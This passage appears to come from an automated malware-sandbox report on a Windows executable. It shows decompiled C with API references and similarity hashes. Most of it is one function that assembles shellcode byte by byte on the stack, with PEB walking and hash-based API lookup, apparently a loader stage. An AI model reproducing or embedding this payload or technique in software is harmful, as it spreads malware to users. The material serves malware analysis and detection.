                                                                    				intOrPtr* _v24;
                                                                    				intOrPtr _v28;
                                                                    				struct _STARTUPINFOW _v96;
                                                                    				intOrPtr _v100;
                                                                    				intOrPtr _v104;
                                                                    				intOrPtr _v108;
                                                                    				unsigned int _t15;
                                                                    				signed int _t27;
                                                                    				intOrPtr _t29;
                                                                    				signed int _t35;
                                                                    				intOrPtr _t52;
                                                                    
                                                                    				_t47 = __edi;
                                                                    				_push(0xffffffff);
                                                                    				_push(0x4050f8);
                                                                    				_push(E00402D34);
                                                                    				_push( *[fs:0x0]);
                                                                    				 *[fs:0x0] = _t52;
                                                                    				_push(__edi);
                                                                    				_v28 = _t52 - 0x58;
                                                                    				_t15 = GetVersion();
                                                                    				 *0x40627c = 0;
                                                                    				_t35 = _t15 & 0x000000ff;
                                                                    				 *0x406278 = _t35;
                                                                    				 *0x406274 = _t35 << 8;
                                                                    				 *0x406270 = _t15 >> 0x10;
                                                                    				if(E00402C00(1) == 0) {
                                                                    					E00402186(0x1c);
                                                                    				}
                                                                    				if(E00402B32() == 0) {
                                                                    					E00402186(0x10);
                                                                    				}
                                                                    				_v8 = 0;
                                                                    				E00402976();
                                                                    				 *0x406694 = E004028D5();
                                                                    				 *0x406264 = E00402768();
                                                                    				E0040253F();
                                                                    				E00402487();
                                                                    				E004021AA();
                                                                    				_v96.dwFlags = 0;
                                                                    				GetStartupInfoW( &_v96);
                                                                    				_v104 = E00402442();
                                                                    				_t56 = _v96.dwFlags & 0x00000001;
                                                                    				if((_v96.dwFlags & 0x00000001) == 0) {
                                                                    					_t27 = 0xa;
                                                                    				} else {
                                                                    					_t27 = _v96.wShowWindow & 0x0000ffff;
                                                                    				}
                                                                    				_push(_t27);
                                                                    				_push(_v104);
                                                                    				_push(0);
                                                                    				_push(GetModuleHandleA(0)); // executed
                                                                    				_t29 = E00401000(); // executed
                                                                    				_v100 = _t29;
                                                                    				E004021D7(_t29);
                                                                    				_t31 = _v24;
                                                                    				_t40 =  *((intOrPtr*)( *_v24));
                                                                    				_v108 =  *((intOrPtr*)( *_v24));
                                                                    				return E004022CA(_t47, _t56, _t40, _t31);
                                                                    			}

                                                                    APIs
                                                                    • GetVersion.KERNEL32 ref: 00402080
                                                                      • Part of subcall function 00402C00: HeapCreate.KERNELBASE(00000000,00001000,00000000,004020B8,00000001), ref: 00402C11
                                                                      • Part of subcall function 00402C00: HeapDestroy.KERNEL32 ref: 00402C2F
                                                                    • GetStartupInfoW.KERNEL32(?), ref: 0040210A
                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040212D
                                                                      • Part of subcall function 00402186: ExitProcess.KERNEL32 ref: 004021A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: Heap$CreateDestroyExitHandleInfoModuleProcessStartupVersion
                                                                    • String ID:
                                                                    • API String ID: 999253471-0
                                                                    • Opcode ID: 42a54ab06592b256e06ea4350abeccc269e871f5c974d075d1cae72575f765e0
                                                                    • Instruction ID: ca130bf8b72715085ec676ada72c515ea2625b52bb235737e5627046e07fe321
                                                                    • Opcode Fuzzy Hash: 42a54ab06592b256e06ea4350abeccc269e871f5c974d075d1cae72575f765e0
                                                                    • Instruction Fuzzy Hash: D82151B1941705AADB18BFB59E0EA6E77B8EF04714F10413FF905BA2D1DABC4840CB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00401000() {
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				char _v24;
                                                                    				char _v25;
                                                                    				char _v26;
                                                                    				char _v27;
                                                                    				char _v28;
                                                                    				char _v29;
                                                                    				char _v30;
                                                                    				char _v31;
                                                                    				char _v32;
                                                                    				char _v33;
                                                                    				char _v34;
                                                                    				char _v35;
                                                                    				char _v36;
                                                                    				char _v37;
                                                                    				char _v38;
                                                                    				char _v39;
                                                                    				char _v40;
                                                                    				char _v41;
                                                                    				char _v42;
                                                                    				char _v43;
                                                                    				char _v44;
                                                                    				char _v45;
                                                                    				char _v46;
                                                                    				char _v47;
                                                                    				char _v48;
                                                                    				char _v49;
                                                                    				char _v50;
                                                                    				char _v51;
                                                                    				char _v52;
                                                                    				char _v53;
                                                                    				char _v54;
                                                                    				char _v55;
                                                                    				char _v56;
                                                                    				char _v57;
                                                                    				char _v58;
                                                                    				char _v59;
                                                                    				char _v60;
                                                                    				char _v61;
                                                                    				char _v62;
                                                                    				char _v63;
                                                                    				char _v64;
                                                                    				char _v65;
                                                                    				char _v66;
                                                                    				char _v67;
                                                                    				char _v68;
                                                                    				char _v69;
                                                                    				char _v70;
                                                                    				char _v71;
                                                                    				char _v72;
                                                                    				char _v73;
                                                                    				char _v74;
                                                                    				char _v75;
                                                                    				char _v76;
                                                                    				char _v77;
                                                                    				char _v78;
                                                                    				char _v79;
                                                                    				char _v80;
                                                                    				char _v81;
                                                                    				char _v82;
                                                                    				char _v83;
                                                                    				char _v84;
                                                                    				char _v85;
                                                                    				char _v86;
                                                                    				char _v87;
                                                                    				char _v88;
                                                                    				char _v89;
                                                                    				char _v90;
                                                                    				char _v91;
                                                                    				char _v92;
                                                                    				char _v93;
                                                                    				char _v94;
                                                                    				char _v95;
                                                                    				char _v96;
                                                                    				char _v97;
                                                                    				char _v98;
                                                                    				char _v99;
                                                                    				char _v100;
                                                                    				char _v101;
                                                                    				char _v102;
                                                                    				char _v103;
                                                                    				char _v104;
                                                                    				char _v105;
                                                                    				char _v106;
                                                                    				char _v107;
                                                                    				char _v108;
                                                                    				char _v109;
                                                                    				char _v110;
                                                                    				char _v111;
                                                                    				char _v112;
                                                                    				char _v113;
                                                                    				char _v114;
                                                                    				char _v115;
                                                                    				char _v116;
                                                                    				char _v117;
                                                                    				char _v118;
                                                                    				char _v119;
                                                                    				char _v120;
                                                                    				char _v121;
                                                                    				char _v122;
                                                                    				char _v123;
                                                                    				char _v124;
                                                                    				char _v125;
                                                                    				char _v126;
                                                                    				char _v127;
                                                                    				char _v128;
                                                                    				char _v129;
                                                                    				char _v130;
                                                                    				char _v131;
                                                                    				char _v132;
                                                                    				char _v133;
                                                                    				char _v134;
                                                                    				char _v135;
                                                                    				char _v136;
                                                                    				char _v137;
                                                                    				char _v138;
                                                                    				char _v139;
                                                                    				char _v140;
                                                                    				char _v141;
                                                                    				char _v142;
                                                                    				char _v143;
                                                                    				char _v144;
                                                                    				char _v145;
                                                                    				char _v146;
                                                                    				char _v147;
                                                                    				char _v148;
                                                                    				char _v149;
                                                                    				char _v150;
                                                                    				char _v151;
                                                                    				char _v152;
                                                                    				char _v153;
                                                                    				char _v154;
                                                                    				char _v155;
                                                                    				char _v156;
                                                                    				char _v157;
                                                                    				char _v158;
                                                                    				char _v159;
                                                                    				char _v160;
                                                                    				char _v161;
                                                                    				char _v162;
                                                                    				char _v163;
                                                                    				char _v164;
                                                                    				char _v165;
                                                                    				char _v166;
                                                                    				char _v167;
                                                                    				char _v168;
                                                                    				char _v169;
                                                                    				char _v170;
                                                                    				char _v171;
                                                                    				char _v172;
                                                                    				char _v173;
                                                                    				char _v174;
                                                                    				char _v175;
                                                                    				char _v176;
                                                                    				char _v177;
                                                                    				char _v178;
                                                                    				char _v179;
                                                                    				char _v180;
                                                                    				char _v181;
                                                                    				char _v182;
                                                                    				char _v183;
                                                                    				char _v184;
                                                                    				char _v185;
                                                                    				char _v186;
                                                                    				char _v187;
                                                                    				char _v188;
                                                                    				char _v189;
                                                                    				char _v190;
                                                                    				char _v191;
                                                                    				char _v192;
                                                                    				char _v193;
                                                                    				char _v194;
                                                                    				char _v195;
                                                                    				char _v196;
                                                                    				char _v197;
                                                                    				char _v198;
                                                                    				char _v199;
                                                                    				char _v200;
                                                                    				char _v201;
                                                                    				char _v202;
                                                                    				char _v203;
                                                                    				char _v204;
                                                                    				char _v205;
                                                                    				char _v206;
                                                                    				char _v207;
                                                                    				char _v208;
                                                                    				char _v209;
                                                                    				char _v210;
                                                                    				char _v211;
                                                                    				char _v212;
                                                                    				char _v213;
                                                                    				char _v214;
                                                                    				char _v215;
                                                                    				char _v216;
                                                                    				char _v217;
                                                                    				char _v218;
                                                                    				char _v219;
                                                                    				char _v220;
                                                                    				char _v221;
                                                                    				char _v222;
                                                                    				char _v223;
                                                                    				char _v224;
                                                                    				char _v225;
                                                                    				char _v226;
                                                                    				char _v227;
                                                                    				char _v228;
                                                                    				char _v229;
                                                                    				char _v230;
                                                                    				char _v231;
                                                                    				char _v232;
                                                                    				char _v233;
                                                                    				char _v234;
                                                                    				char _v235;
                                                                    				char _v236;
                                                                    				char _v237;
                                                                    				char _v238;
                                                                    				char _v239;
                                                                    				char _v240;
                                                                    				char _v241;
                                                                    				char _v242;
                                                                    				char _v243;
                                                                    				char _v244;
                                                                    				char _v245;
                                                                    				char _v246;
                                                                    				char _v247;
                                                                    				char _v248;
                                                                    				char _v249;
                                                                    				char _v250;
                                                                    				char _v251;
                                                                    				char _v252;
                                                                    				char _v253;
                                                                    				char _v254;
                                                                    				char _v255;
                                                                    				char _v256;
                                                                    				char _v257;
                                                                    				char _v258;
                                                                    				char _v259;
                                                                    				char _v260;
                                                                    				char _v261;
                                                                    				char _v262;
                                                                    				char _v263;
                                                                    				char _v264;
                                                                    				char _v265;
                                                                    				char _v266;
                                                                    				char _v267;
                                                                    				char _v268;
                                                                    				char _v269;
                                                                    				char _v270;
                                                                    				char _v271;
                                                                    				char _v272;
                                                                    				char _v273;
                                                                    				char _v274;
                                                                    				char _v275;
                                                                    				char _v276;
                                                                    				char _v277;
                                                                    				char _v278;
                                                                    				char _v279;
                                                                    				char _v280;
                                                                    				char _v281;
                                                                    				char _v282;
                                                                    				char _v283;
                                                                    				char _v284;
                                                                    				char _v285;
                                                                    				char _v286;
                                                                    				char _v287;
                                                                    				char _v288;
                                                                    				char _v289;
                                                                    				char _v290;
                                                                    				char _v291;
                                                                    				char _v292;
                                                                    				char _v293;
                                                                    				char _v294;
                                                                    				char _v295;
                                                                    				char _v296;
                                                                    				char _v297;
                                                                    				char _v298;
                                                                    				char _v299;
                                                                    				char _v300;
                                                                    				char _v301;
                                                                    				char _v302;
                                                                    				char _v303;
                                                                    				char _v304;
                                                                    				char _v305;
                                                                    				char _v306;
                                                                    				char _v307;
                                                                    				char _v308;
                                                                    				char _v309;
                                                                    				char _v310;
                                                                    				char _v311;
                                                                    				char _v312;
                                                                    				char _v313;
                                                                    				char _v314;
                                                                    				char _v315;
                                                                    				char _v316;
                                                                    				char _v317;
                                                                    				char _v318;
                                                                    				char _v319;
                                                                    				char _v320;
                                                                    				char _v321;
                                                                    				char _v322;
                                                                    				char _v323;
                                                                    				char _v324;
                                                                    				char _v325;
                                                                    				char _v326;
                                                                    				char _v327;
                                                                    				char _v328;
                                                                    				char _v329;
                                                                    				char _v330;
                                                                    				char _v331;
                                                                    				char _v332;
                                                                    				char _v333;
                                                                    				char _v334;
                                                                    				char _v335;
                                                                    				char _v336;
                                                                    				char _v337;
                                                                    				char _v338;
                                                                    				char _v339;
                                                                    				char _v340;
                                                                    				char _v341;
                                                                    				char _v342;
                                                                    				char _v343;
                                                                    				char _v344;
                                                                    				char _v345;
                                                                    				char _v346;
                                                                    				char _v347;
                                                                    				char _v348;
                                                                    				char _v349;
                                                                    				char _v350;
                                                                    				char _v351;
                                                                    				char _v352;
                                                                    				char _v353;
                                                                    				char _v354;
                                                                    				char _v355;
                                                                    				char _v356;
                                                                    				char _v357;
                                                                    				char _v358;
                                                                    				char _v359;
                                                                    				char _v360;
                                                                    				char _v361;
                                                                    				char _v362;
                                                                    				char _v363;
                                                                    				char _v364;
                                                                    				char _v365;
                                                                    				char _v366;
                                                                    				char _v367;
                                                                    				char _v368;
                                                                    				char _v369;
                                                                    				char _v370;
                                                                    				char _v371;
                                                                    				char _v372;
                                                                    				char _v373;
                                                                    				char _v374;
                                                                    				char _v375;
                                                                    				char _v376;
                                                                    				char _v377;
                                                                    				char _v378;
                                                                    				char _v379;
                                                                    				char _v380;
                                                                    				char _v381;
                                                                    				char _v382;
                                                                    				char _v383;
                                                                    				char _v384;
                                                                    				char _v385;
                                                                    				char _v386;
                                                                    				char _v387;
                                                                    				char _v388;
                                                                    				char _v389;
                                                                    				char _v390;
                                                                    				char _v391;
                                                                    				char _v392;
                                                                    				char _v393;
                                                                    				char _v394;
                                                                    				char _v395;
                                                                    				char _v396;
                                                                    				char _v397;
                                                                    				char _v398;
                                                                    				char _v399;
                                                                    				char _v400;
                                                                    				char _v401;
                                                                    				char _v402;
                                                                    				char _v403;
                                                                    				char _v404;
                                                                    				char _v405;
                                                                    				char _v406;
                                                                    				char _v407;
                                                                    				char _v408;
                                                                    				char _v409;
                                                                    				char _v410;
                                                                    				char _v411;
                                                                    				char _v412;
                                                                    				char _v413;
                                                                    				char _v414;
                                                                    				char _v415;
                                                                    				char _v416;
                                                                    				char _v417;
                                                                    				char _v418;
                                                                    				char _v419;
                                                                    				char _v420;
                                                                    				char _v421;
                                                                    				char _v422;
                                                                    				char _v423;
                                                                    				char _v424;
                                                                    				char _v425;
                                                                    				char _v426;
                                                                    				char _v427;
                                                                    				char _v428;
                                                                    				char _v429;
                                                                    				char _v430;
                                                                    				char _v431;
                                                                    				char _v432;
                                                                    				char _v433;
                                                                    				char _v434;
                                                                    				char _v435;
                                                                    				char _v436;
                                                                    				char _v437;
                                                                    				char _v438;
                                                                    				char _v439;
                                                                    				char _v440;
                                                                    				char _v441;
                                                                    				char _v442;
                                                                    				char _v443;
                                                                    				char _v444;
                                                                    				char _v445;
                                                                    				char _v446;
                                                                    				char _v447;
                                                                    				char _v448;
                                                                    				char _v449;
                                                                    				char _v450;
                                                                    				char _v451;
                                                                    				char _v452;
                                                                    				char _v453;
                                                                    				char _v454;
                                                                    				char _v455;
                                                                    				char _v456;
                                                                    				char _v457;
                                                                    				char _v458;
                                                                    				char _v459;
                                                                    				char _v460;
                                                                    				char _v461;
                                                                    				char _v462;
                                                                    				char _v463;
                                                                    				char _v464;
                                                                    				char _v465;
                                                                    				char _v466;
                                                                    				char _v467;
                                                                    				char _v468;
                                                                    				char _v469;
                                                                    				char _v470;
                                                                    				char _v471;
                                                                    				char _v472;
                                                                    				char _v473;
                                                                    				char _v474;
                                                                    				char _v475;
                                                                    				char _v476;
                                                                    				char _v477;
                                                                    				char _v478;
                                                                    				char _v479;
                                                                    				char _v480;
                                                                    				char _v481;
                                                                    				char _v482;
                                                                    				char _v483;
                                                                    				char _v484;
                                                                    				char _v485;
                                                                    				char _v486;
                                                                    				char _v487;
                                                                    				char _v488;
                                                                    				char _v489;
                                                                    				char _v490;
                                                                    				char _v491;
                                                                    				char _v492;
                                                                    				char _v493;
                                                                    				char _v494;
                                                                    				char _v495;
                                                                    				char _v496;
                                                                    				char _v497;
                                                                    				char _v498;
                                                                    				char _v499;
                                                                    				char _v500;
                                                                    				char _v501;
                                                                    				char _v502;
                                                                    				char _v503;
                                                                    				char _v504;
                                                                    				char _v505;
                                                                    				char _v506;
                                                                    				char _v507;
                                                                    				char _v508;
                                                                    				char _v509;
                                                                    				char _v510;
                                                                    				char _v511;
                                                                    				char _v512;
                                                                    				char _v513;
                                                                    				char _v514;
                                                                    				char _v515;
                                                                    				char _v516;
                                                                    				char _v517;
                                                                    				char _v518;
                                                                    				char _v519;
                                                                    				char _v520;
                                                                    				char _v521;
                                                                    				char _v522;
                                                                    				char _v523;
                                                                    				char _v524;
                                                                    				char _v525;
                                                                    				char _v526;
                                                                    				char _v527;
                                                                    				char _v528;
                                                                    				char _v529;
                                                                    				char _v530;
                                                                    				char _v531;
                                                                    				char _v532;
                                                                    				char _v533;
                                                                    				char _v534;
                                                                    				char _v535;
                                                                    				char _v536;
                                                                    				char _v537;
                                                                    				char _v538;
                                                                    				char _v539;
                                                                    				char _v540;
                                                                    				char _v541;
                                                                    				char _v542;
                                                                    				char _v543;
                                                                    				char _v544;
                                                                    				char _v545;
                                                                    				char _v546;
                                                                    				char _v547;
                                                                    				char _v548;
                                                                    				char _v549;
                                                                    				char _v550;
                                                                    				char _v551;
                                                                    				char _v552;
                                                                    				char _v553;
                                                                    				char _v554;
                                                                    				char _v555;
                                                                    				char _v556;
                                                                    				char _v557;
                                                                    				char _v558;
                                                                    				char _v559;
                                                                    				char _v560;
                                                                    				char _v561;
                                                                    				char _v562;
                                                                    				char _v563;
                                                                    				char _v564;
                                                                    				char _v565;
                                                                    				char _v566;
                                                                    				char _v567;
                                                                    				char _v568;
                                                                    				char _v569;
                                                                    				char _v570;
                                                                    				char _v571;
                                                                    				char _v572;
                                                                    				char _v573;
                                                                    				char _v574;
                                                                    				char _v575;
                                                                    				char _v576;
                                                                    				char _v577;
                                                                    				char _v578;
                                                                    				char _v579;
                                                                    				char _v580;
                                                                    				char _v581;
                                                                    				char _v582;
                                                                    				char _v583;
                                                                    				char _v584;
                                                                    				char _v585;
                                                                    				char _v586;
                                                                    				char _v587;
                                                                    				char _v588;
                                                                    				char _v589;
                                                                    				char _v590;
                                                                    				char _v591;
                                                                    				char _v592;
                                                                    				char _v593;
                                                                    				char _v594;
                                                                    				char _v595;
                                                                    				char _v596;
                                                                    				char _v597;
                                                                    				char _v598;
                                                                    				char _v599;
                                                                    				char _v600;
                                                                    				char _v601;
                                                                    				char _v602;
                                                                    				char _v603;
                                                                    				char _v604;
                                                                    				char _v605;
                                                                    				char _v606;
                                                                    				char _v607;
                                                                    				char _v608;
                                                                    				char _v609;
                                                                    				char _v610;
                                                                    				char _v611;
                                                                    				char _v612;
                                                                    				char _v613;
                                                                    				char _v614;
                                                                    				char _v615;
                                                                    				char _v616;
                                                                    				char _v617;
                                                                    				char _v618;
                                                                    				char _v619;
                                                                    				char _v620;
                                                                    				char _v621;
                                                                    				char _v622;
                                                                    				char _v623;
                                                                    				char _v624;
                                                                    				char _v625;
                                                                    				char _v626;
                                                                    				char _v627;
                                                                    				char _v628;
                                                                    				char _v629;
                                                                    				char _v630;
                                                                    				char _v631;
                                                                    				char _v632;
                                                                    				char _v633;
                                                                    				char _v634;
                                                                    				char _v635;
                                                                    				_Unknown_base(*)() _v636;
                                                                    				void* _v1636;
                                                                    				int _t637;
                                                                    
                                                                    				_v636 = 0xe9;
                                                                    				_v635 = 0x90;
                                                                    				_v634 = 0;
                                                                    				_v633 = 0;
                                                                    				_v632 = 0;
                                                                    				_v631 = 0x55;
                                                                    				_v630 = 0x8b;
                                                                    				_v629 = 0xec;
                                                                    				_v628 = 0x56;
                                                                    				_v627 = 0x8b;
                                                                    				_v626 = 0x75;
                                                                    				_v625 = 8;
                                                                    				_v624 = 0xba;
                                                                    				_v623 = 0x23;
                                                                    				_v622 = 0x19;
                                                                    				_v621 = 0;
                                                                    				_v620 = 0;
                                                                    				_v619 = 0x57;
                                                                    				_v618 = 0xeb;
                                                                    				_v617 = 0xe;
                                                                    				_v616 = 0x8b;
                                                                    				_v615 = 0xca;
                                                                    				_v614 = 0xd1;
                                                                    				_v613 = 0xe8;
                                                                    				_v612 = 0xc1;
                                                                    				_v611 = 0xe1;
                                                                    				_v610 = 7;
                                                                    				_v609 = 0x46;
                                                                    				_v608 = 0xb;
                                                                    				_v607 = 0xc8;
                                                                    				_v606 = 3;
                                                                    				_v605 = 0xcf;
                                                                    				_v604 = 3;
                                                                    				_v603 = 0xd1;
                                                                    				_v602 = 0xf;
                                                                    				_v601 = 0xbe;
                                                                    				_v600 = 0x3e;
                                                                    				_v599 = 0x8b;
                                                                    				_v598 = 0xc2;
                                                                    				_v597 = 0x85;
                                                                    				_v596 = 0xff;
                                                                    				_v595 = 0x75;
                                                                    				_v594 = 0xe9;
                                                                    				_v593 = 0x5f;
                                                                    				_v592 = 0x5e;
                                                                    				_v591 = 0x5d;
                                                                    				_v590 = 0xc3;
                                                                    				_v589 = 0x55;
                                                                    				_v588 = 0x8b;
                                                                    				_v587 = 0xec;
                                                                    				_v586 = 0x51;
                                                                    				_v585 = 0x51;
                                                                    				_v584 = 0x53;
                                                                    				_v583 = 0x56;
                                                                    				_v582 = 0x57;
                                                                    				_v581 = 0x8b;
                                                                    				_v580 = 0x7d;
                                                                    				_v579 = 8;
                                                                    				_v578 = 0x33;
                                                                    				_v577 = 0xf6;
                                                                    				_v576 = 0x8b;
                                                                    				_v575 = 0x47;
                                                                    				_v574 = 0x3c;
                                                                    				_v573 = 0x8b;
                                                                    				_v572 = 0x44;
                                                                    				_v571 = 0x38;
                                                                    				_v570 = 0x78;
                                                                    				_v569 = 3;
                                                                    				_v568 = 0xc7;
                                                                    				_v567 = 0x8b;
                                                                    				_v566 = 0x50;
                                                                    				_v565 = 0x20;
                                                                    				_v564 = 0x8b;
                                                                    				_v563 = 0x58;
                                                                    				_v562 = 0x1c;
                                                                    				_v561 = 3;
                                                                    				_v560 = 0xd7;
                                                                    				_v559 = 0x8b;
                                                                    				_v558 = 0x48;
                                                                    				_v557 = 0x24;
                                                                    				_v556 = 3;
                                                                    				_v555 = 0xdf;
                                                                    				_v554 = 0x8b;
                                                                    				_v553 = 0x40;
                                                                    				_v552 = 0x18;
                                                                    				_v551 = 3;
                                                                    				_v550 = 0xcf;
                                                                    				_v549 = 0x89;
                                                                    				_v548 = 0x55;
                                                                    				_v547 = 0xfc;
                                                                    				_v546 = 0x89;
                                                                    				_v545 = 0x4d;
                                                                    				_v544 = 0xf8;
                                                                    				_v543 = 0x89;
                                                                    				_v542 = 0x45;
                                                                    				_v541 = 8;
                                                                    				_v540 = 0x85;
                                                                    				_v539 = 0xc0;
                                                                    				_v538 = 0x74;
                                                                    				_v537 = 0x1a;
                                                                    				_v536 = 0x8b;
                                                                    				_v535 = 4;
                                                                    				_v534 = 0xb2;
                                                                    				_v533 = 3;
                                                                    				_v532 = 0xc7;
                                                                    				_v531 = 0x50;
                                                                    				_v530 = 0xe8;
                                                                    				_v529 = 0x96;
                                                                    				_v528 = 0xff;
                                                                    				_v527 = 0xff;
                                                                    				_v526 = 0xff;
                                                                    				_v525 = 0x59;
                                                                    				_v524 = 0x3b;
                                                                    				_v523 = 0x45;
                                                                    				_v522 = 0xc;
                                                                    				_v521 = 0x74;
                                                                    				_v520 = 0x12;
                                                                    				_v519 = 0x8b;
                                                                    				_v518 = 0x55;
                                                                    				_v517 = 0xfc;
                                                                    				_v516 = 0x46;
                                                                    				_v515 = 0x3b;
                                                                    				_v514 = 0x75;
                                                                    				_v513 = 8;
                                                                    				_v512 = 0x72;
                                                                    				_v511 = 0xe6;
                                                                    				_v510 = 0x33;
                                                                    				_v509 = 0xc0;
                                                                    				_v508 = 0x5f;
                                                                    				_v507 = 0x5e;
                                                                    				_v506 = 0x5b;
                                                                    				_v505 = 0x8b;
                                                                    				_v504 = 0xe5;
                                                                    				_v503 = 0x5d;
                                                                    				_v502 = 0xc3;
                                                                    				_v501 = 0x8b;
                                                                    				_v500 = 0x45;
                                                                    				_v499 = 0xf8;
                                                                    				_v498 = 0xf;
                                                                    				_v497 = 0xb7;
                                                                    				_v496 = 4;
                                                                    				_v495 = 0x70;
                                                                    				_v494 = 0x8b;
                                                                    				_v493 = 4;
                                                                    				_v492 = 0x83;
                                                                    				_v491 = 3;
                                                                    				_v490 = 0xc7;
                                                                    				_v489 = 0xeb;
                                                                    				_v488 = 0xeb;
                                                                    				_v487 = 0x55;
                                                                    				_v486 = 0x8b;
                                                                    				_v485 = 0xec;
                                                                    				_v484 = 0x81;
                                                                    				_v483 = 0xec;
                                                                    				_v482 = 0x24;
                                                                    				_v481 = 4;
                                                                    				_v480 = 0;
                                                                    				_v479 = 0;
                                                                    				_v478 = 0x53;
                                                                    				_v477 = 0x56;
                                                                    				_v476 = 0x57;
                                                                    				_v475 = 0x64;
                                                                    				_v474 = 0xa1;
                                                                    				_v473 = 0x30;
                                                                    				_v472 = 0;
                                                                    				_v471 = 0;
                                                                    				_v470 = 0;
                                                                    				_v469 = 0x8b;
                                                                    				_v468 = 0x40;
                                                                    				_v467 = 0xc;
                                                                    				_v466 = 0x8b;
                                                                    				_v465 = 0x40;
                                                                    				_v464 = 0xc;
                                                                    				_v463 = 0x8b;
                                                                    				_v462 = 0;
                                                                    				_v461 = 0x8b;
                                                                    				_v460 = 0;
                                                                    				_v459 = 0x8b;
                                                                    				_v458 = 0x40;
                                                                    				_v457 = 0x18;
                                                                    				_v456 = 0x8b;
                                                                    				_v455 = 0xf0;
                                                                    				_v454 = 0x33;
                                                                    				_v453 = 0xdb;
                                                                    				_v452 = 0x68;
                                                                    				_v451 = 0x41;
                                                                    				_v450 = 0xb9;
                                                                    				_v449 = 0x7e;
                                                                    				_v448 = 0x79;
                                                                    				_v447 = 0x56;
                                                                    				_v446 = 0x89;
                                                                    				_v445 = 0x5d;
                                                                    				_v444 = 0xec;
                                                                    				_v443 = 0xe8;
                                                                    				_v442 = 0x69;
                                                                    				_v441 = 0xff;
                                                                    				_v440 = 0xff;
                                                                    				_v439 = 0xff;
                                                                    				_v438 = 0x68;
                                                                    				_v437 = 0xd4;
                                                                    				_v436 = 0xfe;
                                                                    				_v435 = 0x5d;
                                                                    				_v434 = 0x67;
                                                                    				_v433 = 0x56;
                                                                    				_v432 = 0x8b;
                                                                    				_v431 = 0xf8;
                                                                    				_v430 = 0xe8;
                                                                    				_v429 = 0x5c;
                                                                    				_v428 = 0xff;
                                                                    				_v427 = 0xff;
                                                                    				_v426 = 0xff;
                                                                    				_v425 = 0x68;
                                                                    				_v424 = 0xb3;
                                                                    				_v423 = 0xef;
                                                                    				_v422 = 0xb6;
                                                                    				_v421 = 0xba;
                                                                    				_v420 = 0x56;
                                                                    				_v419 = 0x89;
                                                                    				_v418 = 0x45;
                                                                    				_v417 = 0xf8;
                                                                    				_v416 = 0xe8;
                                                                    				_v415 = 0x4e;
                                                                    				_v414 = 0xff;
                                                                    				_v413 = 0xff;
                                                                    				_v412 = 0xff;
                                                                    				_v411 = 0x68;
                                                                    				_v410 = 0x13;
                                                                    				_v409 = 0xe6;
                                                                    				_v408 = 0x9f;
                                                                    				_v407 = 0xfc;
                                                                    				_v406 = 0x56;
                                                                    				_v405 = 0x89;
                                                                    				_v404 = 0x45;
                                                                    				_v403 = 0xfc;
                                                                    				_v402 = 0xe8;
                                                                    				_v401 = 0x40;
                                                                    				_v400 = 0xff;
                                                                    				_v399 = 0xff;
                                                                    				_v398 = 0xff;
                                                                    				_v397 = 0x68;
                                                                    				_v396 = 0xd6;
                                                                    				_v395 = 0x7e;
                                                                    				_v394 = 0xeb;
                                                                    				_v393 = 0x3c;
                                                                    				_v392 = 0x56;
                                                                    				_v391 = 0x89;
                                                                    				_v390 = 0x45;
                                                                    				_v389 = 0xf4;
                                                                    				_v388 = 0xe8;
                                                                    				_v387 = 0x32;
                                                                    				_v386 = 0xff;
                                                                    				_v385 = 0xff;
                                                                    				_v384 = 0xff;
                                                                    				_v383 = 0x83;
                                                                    				_v382 = 0xc4;
                                                                    				_v381 = 0x28;
                                                                    				_v380 = 0x89;
                                                                    				_v379 = 0x45;
                                                                    				_v378 = 0xf0;
                                                                    				_v377 = 0x8d;
                                                                    				_v376 = 0x85;
                                                                    				_v375 = 0xdc;
                                                                    				_v374 = 0xfb;
                                                                    				_v373 = 0xff;
                                                                    				_v372 = 0xff;
                                                                    				_v371 = 0x68;
                                                                    				_v370 = 3;
                                                                    				_v369 = 1;
                                                                    				_v368 = 0;
                                                                    				_v367 = 0;
                                                                    				_v366 = 0x50;
                                                                    				_v365 = 0x53;
                                                                    				_v364 = 0xff;
                                                                    				_v363 = 0xd7;
                                                                    				_v362 = 0x85;
                                                                    				_v361 = 0xc0;
                                                                    				_v360 = 0xf;
                                                                    				_v359 = 0x84;
                                                                    				_v358 = 0x32;
                                                                    				_v357 = 1;
                                                                    				_v356 = 0;
                                                                    				_v355 = 0;
                                                                    				_v354 = 0x53;
                                                                    				_v353 = 0x68;
                                                                    				_v352 = 0x80;
                                                                    				_v351 = 0;
                                                                    				_v350 = 0;
                                                                    				_v349 = 0;
                                                                    				_v348 = 0x6a;
                                                                    				_v347 = 3;
                                                                    				_v346 = 0x53;
                                                                    				_v345 = 0x6a;
                                                                    				_v344 = 7;
                                                                    				_v343 = 0x68;
                                                                    				_v342 = 0;
                                                                    				_v341 = 0;
                                                                    				_v340 = 0;
                                                                    				_v339 = 0x80;
                                                                    				_v338 = 0x8d;
                                                                    				_v337 = 0x85;
                                                                    				_v336 = 0xdc;
                                                                    				_v335 = 0xfb;
                                                                    				_v334 = 0xff;
                                                                    				_v333 = 0xff;
                                                                    				_v332 = 0x50;
                                                                    				_v331 = 0xff;
                                                                    				_v330 = 0x55;
                                                                    				_v329 = 0xfc;
                                                                    				_v328 = 0x89;
                                                                    				_v327 = 0x45;
                                                                    				_v326 = 0xfc;
                                                                    				_v325 = 0x83;
                                                                    				_v324 = 0xf8;
                                                                    				_v323 = 0xff;
                                                                    				_v322 = 0xf;
                                                                    				_v321 = 0x84;
                                                                    				_v320 = 0xc;
                                                                    				_v319 = 1;
                                                                    				_v318 = 0;
